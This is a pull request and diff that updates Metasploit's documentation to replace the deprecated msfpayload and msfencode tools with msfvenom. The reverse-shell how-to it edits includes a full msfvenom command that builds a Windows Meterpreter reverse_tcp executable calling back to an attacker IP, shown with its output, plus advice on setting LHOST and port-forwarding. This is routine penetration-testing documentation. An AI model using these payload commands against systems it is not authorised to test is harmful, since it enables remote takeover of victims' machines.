### PR TITLE
docs: replace deprecated msfpayload/msfencode references with msfvenom

### DIFF
--- a/docs/metasploit-framework.wiki/Guidelines-for-Accepting-Modules-and-Enhancements.md
+++ b/docs/metasploit-framework.wiki/Guidelines-for-Accepting-Modules-and-Enhancements.md
@@ -52,4 +52,4 @@ Automating a series of discrete functions is generally /not/ the responsibility 
 
 Console functionality should have a focus on exploit and security tool development, with the exploit developer as the typical user. End users should be pointed to an interface such as the Community Edition or MSFGUI and should not expect much in terms of user-friendliness from the console. The console should be considered a debug mode for Metasploit and as close to bare-metal functionality as possible. 
 
-External tools, such `msfpayload` and `msfvenom`, are designed to make exploit development easier and exercise specific techniques. We are happy to continue evaluating tools of this nature for inclusion in the Framework; these should be accompanied by documentation (!), how-to tutorials for quick start, and other helpful text.
+External tools, such as `msfvenom`, are designed to make exploit development easier and exercise specific techniques. We are happy to continue evaluating tools of this nature for inclusion in the Framework; these should be accompanied by documentation (!), how-to tutorials for quick start, and other helpful text.

--- a/docs/metasploit-framework.wiki/How-to-use-a-reverse-shell-in-Metasploit.md
+++ b/docs/metasploit-framework.wiki/How-to-use-a-reverse-shell-in-Metasploit.md
@@ -22,10 +22,10 @@ This article goes over using a reverse shell to get a session.
 
 ## List of Metasploit reverse shells
  
-To get a list of reverse shells, use the `msfpayload` command. B
+To get a list of reverse shells, use the `msfvenom` command:
 
 ```bash
-./msfpayload -l |grep reverse
+msfvenom -l payloads | grep reverse
 ```
 
 As a rule of thumb, always pick a Meterpreter, because it currently provides better support of the post-exploitation Metasploit has to offer. For example, railgun, post modules, different meterpreter commands.
@@ -57,7 +57,7 @@ This also applied to VNC, remote desktop, SMB (psexec), or other remote admin to
 
 ## How to set up for a reverse shell during payload generation
 
-When you generate a reverse shell with either `msfpayload` or `msfvenom`, you must know how to configure the following:
+When you generate a reverse shell with `msfvenom`, you must know how to configure the following:
 
 * **LHOST** - This is the IP address you want your target machine to connect to. If you're in a local area network, it is unlikely your target machine can reach you unless you both are on the same network. In that case, you will have to [find out your public-facing IP address](https://www.google.com/webhp?q=ip#q=ip), and then configure your network to port-forward that connection to your box. LHOST should not be "localhost", or "0.0.0.0", or "127.0.0.1", because if you do, you're telling the target machine to connect to itself (or it may not work at all).
 * **LPORT** - This the port you want your target machine to connect to.
@@ -90,14 +90,16 @@ In this demonstration, we have two boxes:
 
 ### Step 1: Generate the executable payload
 
-On the attacker's box, run `msfpayload` or `msfvenom`: 
+On the attacker's box, run `msfvenom`: 
 
 ```bash
-$ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X > /tmp/iambad.exe
-Created by msfpayload (http://www.metasploit.com).
-Payload: windows/meterpreter/reverse_tcp
-Length: 287
-Options: {"LHOST"=>"192.168.1.123", "LPORT"=>"4444"}
+$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe -o /tmp/iambad.exe
+[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+[-] No arch selected, selecting arch: x86 from the payload
+No encoder specified, outputting raw payload
+Payload size: 354 bytes
+Final size of exe file: 73802 bytes
+Saved as: /tmp/iambad.exe
 ```
 
 ### Step 2: Copy the executable payload to box B

--- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md
+++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md
@@ -28,7 +28,7 @@ First, it is typically used as a payload for an exploit. Here's how to do that:
 
 Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally,
 you would want to do it with msfvenom. If you are old school, you have probably also heard of
-msfpayload and msfencode. msfvenom is a replacement of those.
+msfvenom, which replaced the deprecated msfpayload and msfencode tools.
 
 The following is a basic example of using msfvenom to generate windows/meterpreter/reverse_tcp
 as an executable:


### PR DESCRIPTION
Fixes #21530

msfpayload and msfencode were removed from Metasploit on June 8th, 2015.
This PR updates documentation that still referenced these deprecated tools.

Changes:
- `How-to-use-a-reverse-shell-in-Metasploit.md`: replaced all msfpayload
  commands and references with msfvenom equivalents, including the example
  payload generation command
- `Guidelines-for-Accepting-Modules-and-Enhancements.md`: removed msfpayload
  from the list of external tools (it no longer exists)
- `reverse_tcp.md`: clarified that msfvenom replaced msfpayload and msfencode